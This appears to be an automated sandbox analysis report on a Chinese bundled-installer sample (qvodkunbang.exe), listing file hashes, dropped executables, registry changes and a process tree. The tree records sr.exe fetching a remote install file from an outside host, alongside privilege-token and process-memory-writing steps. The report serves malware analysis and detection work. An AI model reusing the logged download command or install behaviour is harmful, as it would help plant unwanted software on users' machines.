Overview
overview
7Static
static
531dcf3ead0...7a.exe
windows7-x64
731dcf3ead0...7a.exe
windows10-2004-x64
7$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3kuaibo.exe
windows7-x64
5kuaibo.exe
windows10-2004-x64
5qvodkunbang.exe
windows7-x64
7qvodkunbang.exe
windows10-2004-x64
7$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3BaiduP2PService.exe
windows7-x64
3BaiduP2PService.exe
windows10-2004-x64
3P2PBase.dll
windows7-x64
3P2PBase.dll
windows10-2004-x64
3P2PStatReport.dll
windows7-x64
3P2PStatReport.dll
windows10-2004-x64
3P2SBase.dll
windows7-x64
3P2SBase.dll
windows10-2004-x64
3sr.exe
windows7-x64
1sr.exe
windows10-2004-x64
3qvodupdate.exe
windows7-x64
7qvodupdate.exe
windows10-2004-x64
7$APPDATA/t...er.dll
windows7-x64
6$APPDATA/t...er.dll
windows10-2004-x64
6$FAVORITES...��.url
windows7-x64
1$FAVORITES...��.url
windows10-2004-x64
1$FAVORITES...��.url
windows7-x64
1$FAVORITES...��.url
windows10-2004-x64
1Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 10:31
Behavioral task
behavioral1
Sample
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsTools.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsTools.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
kuaibo.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
kuaibo.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
qvodkunbang.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
qvodkunbang.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
$PLUGINSDIR/nsTools.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
$PLUGINSDIR/nsTools.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
BaiduP2PService.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
BaiduP2PService.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
P2PBase.dll
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
P2PBase.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
P2PStatReport.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
P2PStatReport.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
P2SBase.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
P2SBase.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
sr.exe
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
sr.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
qvodupdate.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
qvodupdate.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
$APPDATA/tools/bdmanager.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
$APPDATA/tools/bdmanager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
$FAVORITES/Links/全国最给力充值店-淘宝网.url
Resource
win7-20241023-en
Behavioral task
behavioral30
Sample
$FAVORITES/Links/全国最给力充值店-淘宝网.url
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
$FAVORITES/全国最给力充值店-淘宝网.url
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
$FAVORITES/全国最给力充值店-淘宝网.url
Resource
win10v2004-20241007-en
General
-
Target
qvodkunbang.exe
-
Size
737KB
-
MD5
1009304614108cc969ca448183c54c03
-
SHA1
7df4d9658542c11e40dc390e4dba49554b1084d0
-
SHA256
c5e0e2aad81ed8920984572ea30110c1d341d5a0628213607d396d741526b26f
-
SHA512
05c24315a05f8dae782f33b0b70235dba50f7ee607a3e3f23e2174745db892971843cb62916124983db43ef80268e6558098126f636768ef1edda8dc892c1e5f
-
SSDEEP
12288:gmJxN6cHP8YB5z+V4M1YT8VEIjTJW/y0llDWnG+vs/GMhx1Of4Arr8TqY:gmJxN6cHP8U5z8fBVEsE/y6pqGiaGMhb
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
BaiduP2PService.exesr.exeBaiduP2PService.exepid process 3696 BaiduP2PService.exe 2660 sr.exe 3000 BaiduP2PService.exe -
Loads dropped DLL 13 IoCs
Processes:
qvodkunbang.exeBaiduP2PService.exeBaiduP2PService.exepid process 748 qvodkunbang.exe 748 qvodkunbang.exe 748 qvodkunbang.exe 3696 BaiduP2PService.exe 3696 BaiduP2PService.exe 3696 BaiduP2PService.exe 3696 BaiduP2PService.exe 3696 BaiduP2PService.exe 3000 BaiduP2PService.exe 3000 BaiduP2PService.exe 3000 BaiduP2PService.exe 3000 BaiduP2PService.exe 3000 BaiduP2PService.exe -
Drops file in Program Files directory 8 IoCs
Processes:
qvodkunbang.exedescription ioc process File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
qvodkunbang.exeBaiduP2PService.exesr.exeBaiduP2PService.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qvodkunbang.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BaiduP2PService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BaiduP2PService.exe -
Processes:
BaiduP2PService.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
qvodkunbang.exepid process 748 qvodkunbang.exe 748 qvodkunbang.exe 748 qvodkunbang.exe 748 qvodkunbang.exe 748 qvodkunbang.exe 748 qvodkunbang.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
qvodkunbang.exedescription pid process Token: SeDebugPrivilege 748 qvodkunbang.exe Token: SeDebugPrivilege 748 qvodkunbang.exe Token: SeDebugPrivilege 748 qvodkunbang.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
qvodkunbang.exedescription pid process target process PID 748 wrote to memory of 3696 748 qvodkunbang.exe BaiduP2PService.exe PID 748 wrote to memory of 3696 748 qvodkunbang.exe BaiduP2PService.exe PID 748 wrote to memory of 3696 748 qvodkunbang.exe BaiduP2PService.exe PID 748 wrote to memory of 2660 748 qvodkunbang.exe sr.exe PID 748 wrote to memory of 2660 748 qvodkunbang.exe sr.exe PID 748 wrote to memory of 2660 748 qvodkunbang.exe sr.exe PID 748 wrote to memory of 3000 748 qvodkunbang.exe BaiduP2PService.exe PID 748 wrote to memory of 3000 748 qvodkunbang.exe BaiduP2PService.exe PID 748 wrote to memory of 3000 748 qvodkunbang.exe BaiduP2PService.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\qvodkunbang.exe"C:\Users\Admin\AppData\Local\Temp\qvodkunbang.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:3696
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3000
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
189B
MD56d40fd4c8127da6a2812eecc99ef9111
SHA1094b0cab16e49c5f10927ca0b8bf5266cdea357c
SHA25609d5e7679ea535e89a0de49e9cc116cf10f00a3c228a385fe4a9b0c2e472ab99
SHA5123d17aabff1a29c03cd53d68b47dbd575d07044d86c21a6bafb8aba4d70d540ccb152a9686baa48ab3a556a55515ec086cd2d5441fe6158a6228c4ec5540a7629
-
Filesize
11KB
MD5959ea64598b9a3e494c00e8fa793be7e
SHA140f284a3b92c2f04b1038def79579d4b3d066ee0
SHA25603cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
SHA5125e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64
-
Filesize
262KB
MD569fcb9ae215b1397ae1f9751da7016d0
SHA1da3816591f15fcdae48910fb632ee5d2f8c09d4d
SHA256ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342
SHA512f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689